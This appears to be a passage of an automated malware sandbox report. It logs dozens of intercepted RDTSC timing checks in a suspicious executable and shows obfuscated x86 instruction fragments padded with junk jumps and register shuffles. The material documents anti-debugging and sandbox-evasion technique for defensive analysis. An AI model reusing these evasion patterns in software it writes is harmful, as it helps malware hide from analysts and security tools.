Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C102CF second address: 4C10310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov edx, dword ptr [esi+44h] 0x00000009 pushad 0x0000000a jmp 00007FD1807ED555h 0x0000000f mov dx, si 0x00000012 popad 0x00000013 or edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED559h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10310 second address: 4C10344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FD180B5C163h 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10344 second address: 4C1034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C008F5 second address: 4C0097F instructions: 0x00000000 rdtsc 0x00000002 call 00007FD180B5C164h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD180B5C161h 0x00000012 and esp, FFFFFFF8h 0x00000015 jmp 00007FD180B5C15Eh 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FD180B5C15Eh 0x00000022 sub eax, 3E643188h 0x00000028 jmp 00007FD180B5C15Bh 0x0000002d popfd 0x0000002e mov ebx, esi 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FD180B5C15Eh 0x0000003b and ecx, 66F713E8h 0x00000041 jmp 00007FD180B5C15Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C0097F second address: 4C0099F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C0099F second address: 4C009A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C009A3 second address: 4C009A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C009A9 second address: 4C009C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 push eax 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C009C9 second address: 4C00A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED551h 0x00000008 mov edi, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 mov edi, 0C63314Ch 0x00000015 jmp 00007FD1807ED555h 0x0000001a popad 0x0000001b push ecx 0x0000001c mov cx, dx 0x0000001f pop edi 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007FD1807ED556h 0x00000027 mov esi, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00A26 second address: 4C00AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d call 00007FD180B5C168h 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 pushad 0x00000015 call 00007FD180B5C15Eh 0x0000001a pop ecx 0x0000001b movsx edx, ax 0x0000001e popad 0x0000001f popad 0x00000020 test esi, esi 0x00000022 pushad 0x00000023 jmp 00007FD180B5C168h 0x00000028 pushfd 0x00000029 jmp 00007FD180B5C162h 0x0000002e adc al, 00000048h 0x00000031 jmp 00007FD180B5C15Bh 0x00000036 popfd 0x00000037 popad 0x00000038 je 00007FD1F2E81A34h 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FD180B5C164h 0x00000045 add cx, BBA8h 0x0000004a jmp 00007FD180B5C15Bh 0x0000004f popfd 0x00000050 movzx eax, dx 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push ecx 0x0000005f pop edx 0x00000060 mov ebx, eax 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00AF0 second address: 4C00B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD1807ED54Bh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ecx, esi 0x0000000e jmp 00007FD1807ED552h 0x00000013 je 00007FD1F2B12DD3h 0x00000019 jmp 00007FD1807ED550h 0x0000001e test byte ptr [76FB6968h], 00000002h 0x00000025 pushad 0x00000026 mov ax, 522Dh 0x0000002a popad 0x0000002b jne 00007FD1F2B12DC3h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD1807ED552h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00B53 second address: 4C00B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00B65 second address: 4C00B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00B69 second address: 4C00BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c mov eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FD180B5C15Fh 0x00000016 add ax, DE6Eh 0x0000001b jmp 00007FD180B5C169h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00BA8 second address: 4C00BCE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5AB423F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FD1807ED54Ah 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD1807ED54Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00BCE second address: 4C00BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 42C4h 0x00000007 mov bx, C730h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FD180B5C15Fh 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00BF4 second address: 4C00C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C19 second address: 4C00C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C1E second address: 4C00C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C3B second address: 4C00C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C41 second address: 4C00C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C47 second address: 4C00C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C4B second address: 4C00C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD1807ED559h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C71 second address: 4C00C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E33 second address: 4C10E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E37 second address: 4C10E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E50 second address: 4C10E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E56 second address: 4C10E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E65 second address: 4C10E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E69 second address: 4C10E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10AE2 second address: 4C10B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD1807ED54Ah 0x0000000b push eax 0x0000000c jmp 00007FD1807ED54Bh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED550h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B13 second address: 4C10B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B17 second address: 4C10B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B1D second address: 4C10B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B23 second address: 4C10B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B27 second address: 4C10B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B2B second address: 4C10B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B3B second address: 4C10B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B4C second address: 4C10B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B5C second address: 4C10B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 0050303Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C9070F second address: 4C9071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8085E second address: 4C80864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80864 second address: 4C80868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80868 second address: 4C8086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8086C second address: 4C8087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ah, 35h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8087A second address: 4C808C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD180B5C168h 0x0000000f add si, 58D8h 0x00000014 jmp 00007FD180B5C15Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808C7 second address: 4C808CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808CB second address: 4C808CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808CF second address: 4C808D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808D5 second address: 4C808ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808ED second address: 4C80900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80900 second address: 4C80906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80906 second address: 4C8090A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8090A second address: 4C80934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD180B5C165h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80934 second address: 4C8093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8093A second address: 4C8093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8093E second address: 4C80957 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FD1807ED54Bh 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80727 second address: 4C8072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8072D second address: 4C80731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80731 second address: 4C8074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C160h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8074E second address: 4C80752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80752 second address: 4C80758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80758 second address: 4C80794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 adc si, 62A8h 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD1807ED551h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80794 second address: 4C80799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20227 second address: 4C20253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD1807ED553h 0x00000012 pop eax 0x00000013 mov ecx, edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20253 second address: 4C202B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD180B5C160h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FD180B5C15Dh 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C160h 0x0000001a xor cl, 00000008h 0x0000001d jmp 00007FD180B5C15Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD180B5C165h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C202B3 second address: 4C202B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C202B9 second address: 4C202BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C202BD second address: 4C202CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dh, 9Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80BB0 second address: 4C80BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C160h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C167h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80BDF second address: 4C80C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 sbb eax, 44BDDF1Eh 0x0000000f jmp 00007FD1807ED559h 0x00000014 popfd 0x00000015 jmp 00007FD1807ED550h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80C2B second address: 4C80C88 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 4A3Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e mov ecx, 72B097BFh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a movsx edx, ax 0x0000001d popad 0x0000001e push dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 popad 0x00000023 push dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FD180B5C15Fh 0x0000002f xor esi, 392953EEh 0x00000035 jmp 00007FD180B5C169h 0x0000003a popfd 0x0000003b movzx ecx, dx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80C88 second address: 4C80CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80CA5 second address: 4C80D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FD180B5C159h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD180B5C163h 0x00000017 adc cx, 0C0Eh 0x0000001c jmp 00007FD180B5C169h 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 mov dl, 3Dh 0x00000028 mov cx, BAA5h 0x0000002c popad 0x0000002d mov edx, ecx 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007FD180B5C167h 0x00000039 mov eax, dword ptr [eax] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov edx, esi 0x00000040 pushfd 0x00000041 jmp 00007FD180B5C15Eh 0x00000046 and si, 2018h 0x0000004b jmp 00007FD180B5C15Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80D4A second address: 4C80D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FD1807ED54Bh 0x0000000b xor ax, 44DEh 0x00000010 jmp 00007FD1807ED559h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e mov ecx, edx 0x00000020 mov bh, 8Ah 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx ebx, ax 0x0000002a mov ecx, 74DB3F8Fh 0x0000002f popad 0x00000030 rdtsc
